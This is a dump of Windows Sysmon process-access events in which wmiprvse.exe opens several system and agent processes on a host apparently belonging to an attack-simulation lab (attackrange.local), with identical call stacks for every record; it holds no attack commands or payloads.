15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 